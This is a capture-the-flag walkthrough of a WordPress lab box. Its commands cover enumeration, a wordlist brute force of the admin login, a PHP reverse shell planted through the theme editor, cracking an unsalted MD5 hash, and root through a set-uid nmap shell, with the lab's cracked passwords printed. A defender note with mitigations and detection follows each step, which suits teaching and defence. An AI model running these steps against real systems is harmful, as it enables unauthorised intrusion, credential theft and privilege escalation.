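# Step 1: Enumeration
# Service/version scan of the lab host (TARGET_IP is a placeholder).
nmap -sV TARGET_IP
# 80 HTTP, 443 HTTPS

# Web enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /robots.txt, /wp-admin

# Check robots.txt
curl http://TARGET_IP/robots.txt
# fsocity.dic (wordlist!)
# key-1-of-3.txt (First key!)
# Defender note: robots.txt is served to anyone who requests it and is not an
# access control. Listing a file there advertises it; files that must stay
# private belong outside the web root or behind server-side authorization.
# Detection: a burst of 404 responses to one source in the access log is the
# usual trace of dictionary-based path discovery like the gobuster run above.

# Download wordlist
wget http://TARGET_IP/fsocity.dic
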
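# Step 2: WordPress Exploitation
# WPScan for users
wpscan --url http://TARGET_IP --enumerate u

# Brute force login with wordlist
# First, clean wordlist (remove duplicates)
sort fsocity.dic | uniq > wordlist.txt

# Brute force (takes time!)
wpscan --url http://TARGET_IP --usernames elliot --passwords wordlist.txt

# Found: elliot:ER28-0652
# Defender note: the guess succeeds because the password is an entry in a
# wordlist published on the same server, and nothing in this walkthrough
# suggests the login was throttled or locked after repeated failures.
# Mitigations: lockout or rate limiting on the login endpoints, a second
# factor for administrator accounts, and passwords that appear in no wordlist.
# Detection: a sustained run of failed logins for one account from one source.
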
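# Step 3: WordPress Shell
# Login to wp-admin
# Appearance > Editor > 404.php
# Replace with PHP reverse shell

# Listener on the tester's machine, TCP port 4444.
nc -lvnp 4444
# Visit: http://TARGET_IP/wp-content/themes/twentyfifteen/404.php
# Defender note: the built-in theme editor lets an administrator account
# rewrite PHP that the web server then executes, so a stolen admin password
# becomes code execution as the web server user.
# Mitigations: define('DISALLOW_FILE_EDIT', true); in wp-config.php, and theme
# files that the web server account cannot write.
# Detection: file-integrity changes under wp-content/themes, and outbound
# connections started by the web server / PHP process.
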
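# Step 4: Find Key 2
# From here on the commands run in the shell obtained on the target.
cd /home/robot
cat key-2-of-3.txt
# Permission denied - owned by robot

ls -la
# Found: password.raw-md5

cat password.raw-md5
# robot:c3fcd3d76192e4007dfb496cca67e13b

# Crack with hashcat or online
# Password: abcdefghijklmnopqrstuvwxyz
# Defender note: the key file is protected, but the hash file next to it is
# readable by another account (the cat above succeeds). Its name says raw,
# i.e. unsalted, MD5: a fast hash whose common values can simply be looked up,
# and the password behind it is the lowercase alphabet.
# Mitigations: no credential material in files other users can read; where
# password hashes must be stored, use a salted, deliberately slow scheme
# (bcrypt, scrypt, Argon2); do not reuse a login password in such a file.

su robot
cat key-2-of-3.txt
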
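# Step 5: Privilege Escalation
# List set-uid files; errors from unreadable directories are discarded.
find / -perm -u=s -type f 2>/dev/null
# Found: /usr/local/bin/nmap (old version with interactive mode!)

/usr/local/bin/nmap --interactive
# The next line is typed at nmap's interactive prompt, not at the shell.
nmap> !sh
# Root!
# Defender note: a set-uid binary that can start a shell hands its owner's
# privileges (presumably root here, given the result) to any local user.
# The find command above is the same audit an administrator runs: compare its
# output against a known-good baseline and alert on new set-uid files.
# Mitigations: chmod u-s /usr/local/bin/nmap, replace the outdated build with
# a packaged current release, and grant scan privileges some other way than
# a set-uid bit.

cat /root/key-3-of-3.txt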